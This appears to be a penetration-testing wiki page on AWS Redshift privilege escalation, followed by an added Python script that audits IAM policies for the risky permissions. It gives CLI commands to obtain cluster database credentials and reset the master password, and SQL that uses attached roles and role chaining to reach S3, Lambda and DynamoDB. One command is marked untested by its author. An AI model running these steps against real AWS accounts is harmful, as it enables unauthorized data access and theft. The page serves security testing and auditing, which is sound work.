AWS - Redshift Privesc

Redshift

For more information about RDS, check:

AWS - Redshift Enum

redshift:DescribeClusters, redshift:GetClusterCredentials

With these permissions you can get information about all the clusters (including the cluster name and the cluster username) and get credentials to access them:

bash
# Get creds
aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:<username>" -d template1 -p 5439

Potential Impact: Find sensitive information inside the databases.

redshift:DescribeClusters, redshift:GetClusterCredentialsWithIAM

With these permissions you can get information about all the clusters and get credentials to access them.
Note that the postgres user will have the permissions that the IAM identity used to obtain the credentials has.

bash
# Get creds
aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439

Potential Impact: Find sensitive information inside the databases.

redshift:DescribeClusters, redshift:ModifyCluster?

It is possible to change the master password of the internal postgres (redshift) user from the aws cli (I think those are the permissions you need but I haven't tested them yet):

aws redshift modify-cluster --cluster-identifier <identifier-for-the-cluster> --master-user-password 'master-password'

Potential Impact: Find sensitive information inside the databases.
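
To review who holds the three permission sets above, the following added example (not part of the original page) scans an IAM identity policy document for Allow statements that grant them and reports whether the grant is unscoped. The function names, the sample policy, the account ID and the cluster name are constructed for illustration; the check only reads `Action` and `Resource` in Allow statements and does not evaluate Deny, `NotAction` or `Condition`.

```python
import fnmatch

# Actions discussed on this page, mapped to the access each one yields.
RISKY = {
    "redshift:GetClusterCredentials": "temporary password for a chosen database user",
    "redshift:GetClusterCredentialsWithIAM": "temporary password mapped to the caller's IAM identity",
    "redshift:ModifyCluster": "can reset the master user password",
}

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _any_db_user(resource):
    # "*" or a dbuser ARN ending in a wildcard user lets the caller pick any --db-user.
    r = resource.lower()
    return r == "*" or (":dbuser:" in r and r.rsplit("/", 1)[-1] == "*")

def audit_policy(policy):
    """Return findings for Allow statements that grant the risky Redshift actions."""
    findings = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement", []))):
        if stmt.get("Effect") != "Allow" or "Action" not in stmt:
            continue
        patterns = [a.lower() for a in _as_list(stmt["Action"])]  # IAM actions are case-insensitive
        resources = _as_list(stmt.get("Resource", []))
        for action, why in RISKY.items():
            if not any(fnmatch.fnmatchcase(action.lower(), p) for p in patterns):
                continue
            broad = (any(_any_db_user(r) for r in resources)
                     if action == "redshift:GetClusterCredentials" else "*" in resources)
            findings.append({"statement": idx, "action": action, "unscoped": broad, "why": why})
    return findings

# Constructed sample policy (account ID and cluster name are placeholders).
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["redshift:Describe*", "redshift:GetClusterCredentials"],
         "Resource": "*"},
        {"Effect": "Allow", "Action": "redshift:GetClusterCredentials",
         "Resource": "arn:aws:redshift:us-east-1:111122223333:dbuser:example-cluster/report_ro"},
        {"Effect": "Allow", "Action": "redshift:Modify*",
         "Resource": "arn:aws:redshift:us-east-1:111122223333:cluster:example-cluster"},
    ],
}

if __name__ == "__main__":
    for finding in audit_policy(SAMPLE_POLICY):
        print(finding)
```

A finding with `unscoped` set to true on `redshift:GetClusterCredentials` means the principal can request credentials for any database user; scoping the `dbuser` resource to a named low-privilege user closes that path.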

Accessing External Services

warning

To access all of the following resources, you will need to specify the role to use. A Redshift cluster can have a list of AWS roles assigned that you can use if you know the ARN, or you can just set "default" to use the default one assigned.

Moreover, as explained here, Redshift also allows chaining roles (as long as the first role can assume the second one) to get further access, simply by separating them with a comma: iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';

Lambdas

As explained in https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html, it is possible to call a lambda function from redshift with something like:

sql
CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT)
RETURNS INT
STABLE
LAMBDA 'lambda_function'
IAM_ROLE default;

S3

As explained in https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html, it is possible to read from and write to S3 buckets:

sql
-- Read
copy table from 's3://<your-bucket-name>/load/key_prefix'
credentials 'aws_iam_role=arn:aws:iam::<aws-account-id>:role/<role-name>'
region '<region>'
options;

-- Write
unload ('select * from venue')
to 's3://mybucket/tickit/unload/venue_'
iam_role default;

Dynamo

As explained in https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html, it is possible to get data from dynamodb:

sql
copy favoritemovies
from 'dynamodb://ProductCatalog'
iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole';

warning

The Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster, unless you use the REGION option to specify the AWS Region in which the Amazon DynamoDB table is located.

EMR

Check https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html
